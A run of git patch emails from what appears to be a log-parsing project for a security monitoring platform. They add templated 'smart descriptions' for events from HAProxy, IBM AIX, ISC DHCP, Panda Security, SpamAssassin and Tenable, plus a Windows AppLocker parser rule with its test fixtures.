From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 16:10:12 +0200
Subject: [PATCH 135/317] Added HAProxy smart description

---
 HAProxy/haproxy/_meta/smart-descriptions.json | 45 ++++++++++++++++++-
 1 file changed, 44 insertions(+), 1 deletion(-)

diff --git a/HAProxy/haproxy/_meta/smart-descriptions.json b/HAProxy/haproxy/_meta/smart-descriptions.json
index fe51488c7..b41b1e6a3 100644
--- a/HAProxy/haproxy/_meta/smart-descriptions.json
+++ b/HAProxy/haproxy/_meta/smart-descriptions.json
@@ -1 +1,44 @@
-[]
+[
+    {
+        "value": "A {http.request.method} request was made to {url.original} from {source.ip} on host {log.hostname}",
+        "conditions": [
+            {
+                "field": "http.request.method"
+            },
+            {
+                "field": "log.hostname"
+            },
+            {
+                "field": "url.original"
+            },
+            {
+                "field": "source.ip"
+            }
+        ]
+    },
+    {
+        "value": "A {http.request.method} request was made to {url.original} from {source.ip}",
+        "conditions": [
+            {
+                "field": "http.request.method"
+            },
+            {
+                "field": "url.original"
+            },
+            {
+                "field": "source.ip"
+            }
+        ]
+    },
+    {
+        "value": "A {http.request.method} request was made to {url.original}",
+        "conditions": [
+            {
+                "field": "http.request.method"
+            },
+            {
+                "field": "url.original"
+            }
+        ]
+    }
+]

From b7dc95470ea15a09c3b7745ba8b8a0a29133d0b0 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 16:12:17 +0200
Subject: [PATCH 136/317] Updated tests for HAProxy

---
 HAProxy/haproxy/tests/json.json     | 3 ---
 HAProxy/haproxy/tests/standard.json | 3 ---
 2 files changed, 6 deletions(-)

diff --git a/HAProxy/haproxy/tests/json.json b/HAProxy/haproxy/tests/json.json
index 4ee805c37..43c00bbac 100644
--- a/HAProxy/haproxy/tests/json.json
+++ b/HAProxy/haproxy/tests/json.json
@@ -27,9 +27,6 @@
       "subdomain": "backoffice",
       "top_level_domain": "fr"
     },
-    "host": {
-      "name": "B96f1GJTxDUKbh2l"
-    },
     "http": {
       "request": {
         "method": "GET"
diff --git a/HAProxy/haproxy/tests/standard.json b/HAProxy/haproxy/tests/standard.json
index 6886d242c..faf509d78 100644
--- a/HAProxy/haproxy/tests/standard.json
+++ b/HAProxy/haproxy/tests/standard.json
@@ -14,9 +14,6 @@
     "event": {
       "kind": "access"
     },
-    "host": {
-      "name": "B96f1GJTxDUKbh2l"
-    },
     "http": {
       "request": {
         "method": "GET"

From da24fc2e391490fbdd5769386774446e2c69e6bb Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 16:22:07 +0200
Subject: [PATCH 137/317] Smart descriptions for IBM AIX

---
 IBM/ibm-aix/_meta/smart-descriptions.json | 54 ++++++++++++++++++++++-
 1 file changed, 53 insertions(+), 1 deletion(-)

diff --git a/IBM/ibm-aix/_meta/smart-descriptions.json b/IBM/ibm-aix/_meta/smart-descriptions.json
index 0967ef424..91d1029ff 100644
--- a/IBM/ibm-aix/_meta/smart-descriptions.json
+++ b/IBM/ibm-aix/_meta/smart-descriptions.json
@@ -1 +1,53 @@
-{}
+[
+    {
+        "value": "{action.target} event \"{event.action}\" was effectuated by {user.name} (status: {action.status})",
+        "conditions":
+        [
+            {
+                "field": "action.status"
+            },
+            {
+                "field": "action.target"
+            },
+            {
+                "field": "event.action"
+            },
+            {
+                "field": "user.name"
+            }
+        ]
+    },
+    {
+        "value": "{action.target} event \"{event.action}\" was effectuated by user {user.id} (status: {action.status})",
+        "conditions":
+        [
+            {
+                "field": "action.status"
+            },
+            {
+                "field": "action.target"
+            },
+            {
+                "field": "event.action"
+            },
+            {
+                "field": "user.id"
+            }
+        ]
+    },
+    {
+        "value": "{action.target} event \"{event.action}\" was effectuated (status: {action.status})",
+        "conditions":
+        [
+            {
+                "field": "action.status"
+            },
+            {
+                "field": "action.target"
+            },
+            {
+                "field": "event.action"
+            }
+        ]
+    }
+]
\ No newline at end of file

From 6e6a5bbc9f7f0eff96e498e9908ddea96c6c86f9 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 16:24:16 +0200
Subject: [PATCH 138/317] Adding a generic smart description for the IBM AIX
 module

---
 IBM/ibm-aix/_meta/smart-descriptions.json | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/IBM/ibm-aix/_meta/smart-descriptions.json b/IBM/ibm-aix/_meta/smart-descriptions.json
index 91d1029ff..b333d6eb3 100644
--- a/IBM/ibm-aix/_meta/smart-descriptions.json
+++ b/IBM/ibm-aix/_meta/smart-descriptions.json
@@ -49,5 +49,17 @@
                 "field": "event.action"
             }
         ]
+    },
+    {
+        "value": "{action.target} event \"{event.action}\" was effectuated",
+        "conditions":
+        [
+            {
+                "field": "action.target"
+            },
+            {
+                "field": "event.action"
+            }
+        ]
     }
 ]
\ No newline at end of file

From fb5cb49d5418b89bc082d57b5dfaa141e1dba71e Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 16:33:06 +0200
Subject: [PATCH 139/317] Smart Descriptions for ISC DHCP

---
 ISC DHCP/dhcpd/_meta/smart-descriptions.json | 63 +++++++++++++++++++-
 1 file changed, 62 insertions(+), 1 deletion(-)

diff --git a/ISC DHCP/dhcpd/_meta/smart-descriptions.json b/ISC DHCP/dhcpd/_meta/smart-descriptions.json
index fe51488c7..f17e71690 100644
--- a/ISC DHCP/dhcpd/_meta/smart-descriptions.json	
+++ b/ISC DHCP/dhcpd/_meta/smart-descriptions.json	
@@ -1 +1,62 @@
-[]
+[
+    {
+        "value": "A {dhcpd.query} query has been launched with {event.outcome} from {source.address} to {destination.address}",
+        "conditions":
+        [
+            {
+                "field": "dhcpd.query"
+            },
+            {
+                "field": "destination.address"
+            },
+            {
+                "field": "event.outcome"
+            },
+            {
+                "field": "source.address"
+            }
+        ]
+    },
+    {
+        "value": "A {dhcpd.query} query has been launched with {event.outcome} from {source.address}",
+        "conditions":
+        [
+            {
+                "field": "dhcpd.query"
+            },
+            {
+                "field": "event.outcome"
+            },
+            {
+                "field": "source.address"
+            }
+        ]
+    },
+    {
+        "value": "A {dhcpd.query} query has been launched with {event.outcome} to {destination.address}",
+        "conditions":
+        [
+            {
+                "field": "dhcpd.query"
+            },
+            {
+                "field": "destination.address"
+            },
+            {
+                "field": "event.outcome"
+            }
+        ]
+    },
+    {
+        "value": "A {dhcpd.query} query has been launched with {event.outcome}",
+        "conditions":
+        [
+            {
+                "field": "dhcpd.query"
+            },
+            {
+                "field": "event.outcome"
+            }
+        ]
+    }
+]

From b8bafa3d8fae5a800631a1141208253ba0b9b686 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 15:52:01 +0200
Subject: [PATCH 140/317] Smart descriptions for Log Insight Windows agent

---
 .../_meta/smart-descriptions.json             | 60 ++++++++++++++++++-
 1 file changed, 59 insertions(+), 1 deletion(-)

diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index fe51488c7..98457f5df 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
@@ -1 +1,59 @@
-[]
+[
+    {
+        "value": "Action ID {action.id}: {action.name} on target {user.target.name}.",
+        "conditions":
+        [
+            {
+                "field": "action.id"
+            },
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "user.target.name"
+            }
+        ]
+    },
+    {
+        "value": "A {event.type[0]} {event.category[0]} event was launched with {event.outcome} on target {user.target.name}.",
+        "conditions":
+        [
+            {
+                "field": "event.type"
+            },
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.outcome"
+            },
+            {
+                "field": "user.target.name"
+            }
+        ]
+    },
+    {
+        "value": "{action.name} on target {user.target.name}.",
+        "conditions":
+        [
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "user.target.name"
+            }
+        ]
+    },
+    {
+        "value": "{action.name} by {user.name}.",
+        "conditions":
+        [
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "user.name"
+            }
+        ]
+    }
+]

From b3b5242f5aee3dbdaffc6640240c462abdc0f70e Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 15:54:31 +0200
Subject: [PATCH 141/317] small fix

---
 .../log-insight-windows/_meta/smart-descriptions.json           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index 98457f5df..e77c3c1d3 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
@@ -15,7 +15,7 @@
         ]
     },
     {
-        "value": "A {event.type[0]} {event.category[0]} event was launched with {event.outcome} on target {user.target.name}.",
+        "value": "A {event.type.0} {event.category.0} event was launched with {event.outcome} on target {user.target.name}.",
         "conditions":
         [
             {

From fa9a11ee993dce4c019928d603c4e428ea8424f0 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 15:56:08 +0200
Subject: [PATCH 142/317] Small fix

---
 .../log-insight-windows/_meta/smart-descriptions.json           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index e77c3c1d3..5a77c98b3 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
@@ -15,7 +15,7 @@
         ]
     },
     {
-        "value": "A {event.type.0} {event.category.0} event was launched with {event.outcome} on target {user.target.name}.",
+        "value": "A {event.type | first} {event.category | first} event was launched with {event.outcome} on target {user.target.name}.",
         "conditions":
         [
             {

From 1712be8e920cd9522d0c0dad222a262919f3ea8c Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 15:57:30 +0200
Subject: [PATCH 143/317] small fix

---
 .../log-insight-windows/_meta/smart-descriptions.json           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index 5a77c98b3..2b726495d 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json	
@@ -15,7 +15,7 @@
         ]
     },
     {
-        "value": "A {event.type | first} {event.category | first} event was launched with {event.outcome} on target {user.target.name}.",
+        "value": "A {event.type} {event.category} event was launched with {event.outcome} on target {user.target.name}.",
         "conditions":
         [
             {

From 8407aeaa71822e09709e7990c46589bd3635bab3 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 16:07:02 +0200
Subject: [PATCH 144/317] Smart Descriptions for Panda Security Aether

---
 .../Aether/_meta/smart-descriptions.json      | 84 ++++++++++++++++++-
 1 file changed, 83 insertions(+), 1 deletion(-)

diff --git a/Panda Security/Aether/_meta/smart-descriptions.json b/Panda Security/Aether/_meta/smart-descriptions.json
index fe51488c7..db8286e45 100644
--- a/Panda Security/Aether/_meta/smart-descriptions.json	
+++ b/Panda Security/Aether/_meta/smart-descriptions.json	
@@ -1 +1,83 @@
-[]
+[
+    {
+        "value": "A {event.category} {event.type} event of {event.kind} kind was launched",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            },
+            {
+                "field": "event.kind"
+            }
+        ]
+    },
+    {
+        "value": "A {action.name} action was launched on the {host.type} host {host.name}",
+        "conditions": [
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "host.type"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    },
+    {
+        "value": "A {action.name} action was launched on the host {host.name}",
+        "conditions": [
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    },
+    {
+        "value": "A {action.name} action was launched on the {host.type} host {host.name}. Reason: {event.reason}",
+        "conditions": [
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "event.reason"
+            },
+            {
+                "field": "host.type"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    },
+    {
+        "value": "A {action.name} action was launched on the host {host.name}",
+        "conditions": [
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    },
+    {
+        "value": "A {action.name} action was launched on the host {host.name}. Reason: {event.reason}",
+        "conditions": [
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "event.reason"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    }
+]

From df533ce7d7997a5a7bb707b0adebcf0b7d516b98 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 16:10:49 +0200
Subject: [PATCH 145/317] Addition of a smart description in the Aether module

---
 .../Aether/_meta/smart-descriptions.json      | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)

diff --git a/Panda Security/Aether/_meta/smart-descriptions.json b/Panda Security/Aether/_meta/smart-descriptions.json
index db8286e45..dc68a245b 100644
--- a/Panda Security/Aether/_meta/smart-descriptions.json	
+++ b/Panda Security/Aether/_meta/smart-descriptions.json	
@@ -79,5 +79,38 @@
                 "field": "host.name"
             }
         ]
+    },
+    {
+        "value": "{event.reason} on the {host.type} host {host.name}",
+        "conditions": [
+            {
+                "field": "event.reason"
+            },
+            {
+                "field": "host.type"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    },
+    {
+        "value": "{event.reason} on the host {host.name}",
+        "conditions": [
+            {
+                "field": "event.reason"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    },
+    {
+        "value": "{event.reason}",
+        "conditions": [
+            {
+                "field": "event.reason"
+            }
+        ]
     }
 ]

From 1892bb12e3649bfd3917a3d5f0639dd4289cbe29 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 16:14:45 +0200
Subject: [PATCH 146/317] Smart Descriptions for Panda Security SIEM Feeder

---
 .../SIEM Feeder/_meta/smart-descriptions.json | 59 ++++++++++++++++++-
 1 file changed, 58 insertions(+), 1 deletion(-)

diff --git a/Panda Security/SIEM Feeder/_meta/smart-descriptions.json b/Panda Security/SIEM Feeder/_meta/smart-descriptions.json
index fe51488c7..8d432c0c2 100644
--- a/Panda Security/SIEM Feeder/_meta/smart-descriptions.json	
+++ b/Panda Security/SIEM Feeder/_meta/smart-descriptions.json	
@@ -1 +1,58 @@
-[]
+[
+    {
+        "value": "A {event.category} {event.type} event was launched on host {host.name} by {source.address}",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            },
+            {
+                "field": "host.name"
+            },
+            {
+                "field": "source.address"
+            }
+        ]
+    },
+    {
+        "value": "A {event.category} {event.type} event was launched on host {host.name}",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            },
+            {
+                "field": "host.name"
+            }
+        ]
+    },
+    {
+        "value": "A {event.category} {event.type} event was launched by {source.address}",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            },
+            {
+                "field": "source.address"
+            }
+        ]
+    },
+    {
+        "value": "A {event.category} {event.type} event was launched",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            }
+        ]
+    }
+]

From 83ad458e12d53c938a73f01e6a79e1d543b79432 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 16:21:13 +0200
Subject: [PATCH 147/317] Add smart descriptions for SpamAssassin

---
 .../_meta/smart-descriptions.json             | 47 ++++++++++++++++++-
 1 file changed, 46 insertions(+), 1 deletion(-)

diff --git a/SpamAssassin/spamassassin/_meta/smart-descriptions.json b/SpamAssassin/spamassassin/_meta/smart-descriptions.json
index fe51488c7..71479ec8b 100644
--- a/SpamAssassin/spamassassin/_meta/smart-descriptions.json
+++ b/SpamAssassin/spamassassin/_meta/smart-descriptions.json
@@ -1 +1,46 @@
-[]
+[
+    {
+        "value": "An event initiated by {source.address} has been launched.",
+        "conditions": [
+            {
+                "field": "source.address"
+            }
+        ]
+    },
+    {
+        "value": "An event initiated by {source.address} has been launched. It is related to user {user.name}.",
+        "conditions": [
+            {
+                "field": "source.address"
+            },
+            {
+                "field": "user.name"
+            }
+        ]
+    },
+    {
+        "value": "An event initiated by {source.address} has been launched on port {source.port}.",
+        "conditions": [
+            {
+                "field": "source.address"
+            },
+            {
+                "field": "source.port"
+            }
+        ]
+    },
+    {
+        "value": "An event initiated by {source.address} has been launched on port {source.port}. It is related to user {user.name}.",
+        "conditions": [
+            {
+                "field": "source.address"
+            },
+            {
+                "field": "source.port"
+            },
+            {
+                "field": "user.name"
+            }
+        ]
+    }
+]

From 04b1d76f38638f82e2fe1a38cebf9adde64087ba Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 16:36:43 +0200
Subject: [PATCH 148/317] Smart Descriptions for Alsid

---
 Tenable/alsid/_meta/smart-descriptions.json | 116 +++++++++++++++++++-
 1 file changed, 115 insertions(+), 1 deletion(-)

diff --git a/Tenable/alsid/_meta/smart-descriptions.json b/Tenable/alsid/_meta/smart-descriptions.json
index fe51488c7..228fbe5f8 100644
--- a/Tenable/alsid/_meta/smart-descriptions.json
+++ b/Tenable/alsid/_meta/smart-descriptions.json
@@ -1 +1,115 @@
-[]
+[
+    {
+        "value": "The {action.properties.alertSeverityLevel} {action.type} action {action.name} was launched with {action.outcome}. Event ID: {action.properties.eventID}",
+        "conditions": [
+            {
+                "field": "action.properties.alertSeverityLevel"
+            },
+            {
+                "field": "action.type",
+                "value": "alert"
+            },
+            {
+                "field": "action.outcome"
+            },
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "action.properties.eventID"
+            }
+        ]
+    },
+    {
+        "value": "The {action.properties.alertSeverityLevel} {action.type} action {action.name} was launched with {action.outcome} by user {user.name}. Event ID: {action.properties.eventID}",
+        "conditions": [
+            {
+                "field": "action.properties.alertSeverityLevel"
+            },
+            {
+                "field": "action.type",
+                "value": "alert"
+            },
+            {
+                "field": "action.outcome"
+            },
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "action.properties.eventID"
+            },
+            {
+                "field": "user.name"
+            }
+        ]
+    },
+    {
+        "value": "The {action.type} action {action.name} was launched with {action.outcome} by {user.name}. Event ID: {action.properties.eventID}",
+        "conditions": [
+            {
+                "field": "action.type"
+            },
+            {
+                "field": "action.properties.eventID"
+            },
+            {
+                "field": "action.outcome"
+            },
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "user.name"
+            }
+        ]
+    },
+    {
+        "value": "The {action.type} action {action.name} was launched with {action.outcome}. Event ID: {action.properties.eventID}",
+        "conditions": [
+            {
+                "field": "action.type"
+            },
+            {
+                "field": "action.outcome"
+            },
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "action.properties.eventID"
+            }
+        ]
+    },
+    {
+        "value": "The {action.type} action {action.name} was launched with {action.outcome} by {user.name}.",
+        "conditions": [
+            {
+                "field": "action.type"
+            },
+            {
+                "field": "action.outcome"
+            },
+            {
+                "field": "action.name"
+            },
+            {
+                "field": "user.name"
+            }
+        ]
+    },
+    {
+        "value": "The {action.type} action {action.name} was launched with {action.outcome}.",
+        "conditions": [
+            {
+                "field": "action.type"
+            },
+            {
+                "field": "action.outcome"
+            },
+            {
+                "field": "action.name"
+            }
+        ]
+    }
+]

From 55a12688f98efefc0b970b8f3fe1df8f62835791 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 16:41:54 +0200
Subject: [PATCH 149/317] Add SmartDescription for the 'alsid' plugin

---
 Tenable/alsid/_meta/smart-descriptions.json | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/Tenable/alsid/_meta/smart-descriptions.json b/Tenable/alsid/_meta/smart-descriptions.json
index 228fbe5f8..7deb8c52b 100644
--- a/Tenable/alsid/_meta/smart-descriptions.json
+++ b/Tenable/alsid/_meta/smart-descriptions.json
@@ -111,5 +111,24 @@
                 "field": "action.name"
             }
         ]
+    },
+    {
+        "value": "A {action.type} action has been launched. Event ID: {action.properties.eventID}",
+        "conditions": [
+            {
+                "field": "action.type"
+            },
+            {
+                "field": "action.properties.eventID"
+            }
+        ]
+    },
+    {
+        "value": "A {action.type}action has been launched.",
+        "conditions": [
+            {
+                "field": "action.type"
+            }
+        ]
     }
 ]

From bccdaddaa3571b9cc5a0299132aad62741b2b309 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 16:42:20 +0200
Subject: [PATCH 150/317] Fixing typo

---
 Tenable/alsid/_meta/smart-descriptions.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Tenable/alsid/_meta/smart-descriptions.json b/Tenable/alsid/_meta/smart-descriptions.json
index 7deb8c52b..892e69d02 100644
--- a/Tenable/alsid/_meta/smart-descriptions.json
+++ b/Tenable/alsid/_meta/smart-descriptions.json
@@ -124,7 +124,7 @@
         ]
     },
     {
-        "value": "A {action.type}action has been launched.",
+        "value": "A {action.type} action has been launched.",
         "conditions": [
             {
                 "field": "action.type"

From eb86b34b28ddeffb8caab2347759e2ba055655e5 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 14 Oct 2024 17:44:37 +0200
Subject: [PATCH 151/317] Addition of files fields for events 8002 and 8005

---
 Windows/windows/ingest/parser.yml       |  5 ++
 Windows/windows/tests/process_8002.json | 72 +++++++++++++++++++++++++
 Windows/windows/tests/process_8005.json | 72 +++++++++++++++++++++++++
 3 files changed, 149 insertions(+)
 create mode 100644 Windows/windows/tests/process_8002.json
 create mode 100644 Windows/windows/tests/process_8005.json

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index fe3cbc5db..9c8ae969f 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -212,6 +212,11 @@ stages:
           file.hash.sha256: "{{parsed_hashes_kv.result.SHA256}}"
         filter: "{{json.event.EventID in (15,23,24,28) }}"
 
+      - set:
+          file.name: '{{json.event.Message.split(" ")[0].split("\\")[-1]}}'
+          file.path: "{{json.event.Message.split(' ')[0]}}"
+        filter: "{{json.event.EventID in (8002, 8005)}}"
+
   finalize:
     actions:
       - set:
diff --git a/Windows/windows/tests/process_8002.json b/Windows/windows/tests/process_8002.json
new file mode 100644
index 000000000..2fa32d712
--- /dev/null
+++ b/Windows/windows/tests/process_8002.json
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Windows",
+        "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
+      }
+    },
+    "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+  },
+  "expected": {
+    "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
+    "event": {
+      "code": "8002",
+      "message": "%SYSTEM32%\\TEST\\APP.EXE was allowed to run.",
+      "provider": "Microsoft-Windows-AppLocker"
+    },
+    "action": {
+      "id": 8002,
+      "properties": {
+        "AccountName": "SYSTEM",
+        "AccountType": "User",
+        "Domain": "NT AUTHORITY",
+        "EventType": "INFO",
+        "Keywords": "-9223372036854775808",
+        "OpcodeValue": 0,
+        "ProviderGuid": "{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}",
+        "Severity": "INFO",
+        "SourceName": "Microsoft-Windows-AppLocker",
+        "Task": 0
+      },
+      "record_id": 1812526,
+      "type": "Microsoft-Windows-AppLocker/EXE and DLL"
+    },
+    "file": {
+      "name": "APP.EXE",
+      "path": "%SYSTEM32%\\TEST\\APP.EXE"
+    },
+    "host": {
+      "hostname": "HOST.test.fr",
+      "name": "HOST.test.fr"
+    },
+    "log": {
+      "hostname": "HOST.test.fr",
+      "level": "info"
+    },
+    "os": {
+      "family": "windows",
+      "platform": "windows"
+    },
+    "process": {
+      "id": 2476,
+      "pid": 2476,
+      "thread": {
+        "id": 2720
+      }
+    },
+    "related": {
+      "hosts": [
+        "HOST.test.fr"
+      ],
+      "user": [
+        "SYSTEM"
+      ]
+    },
+    "user": {
+      "domain": "NT AUTHORITY",
+      "id": "S-1-2-34",
+      "name": "SYSTEM"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Windows/windows/tests/process_8005.json b/Windows/windows/tests/process_8005.json
new file mode 100644
index 000000000..6b0b66287
--- /dev/null
+++ b/Windows/windows/tests/process_8005.json
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Windows",
+        "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
+      }
+    },
+    "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+  },
+  "expected": {
+    "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
+    "event": {
+      "code": "8005",
+      "message": "%OSDRIVE%\\USERS\\ACCOUNT\\APPDATA\\LOCAL\\TEMP\\file.test was allowed to run.",
+      "provider": "Microsoft-Windows-AppLocker"
+    },
+    "action": {
+      "id": 8005,
+      "properties": {
+        "AccountName": "account",
+        "AccountType": "User",
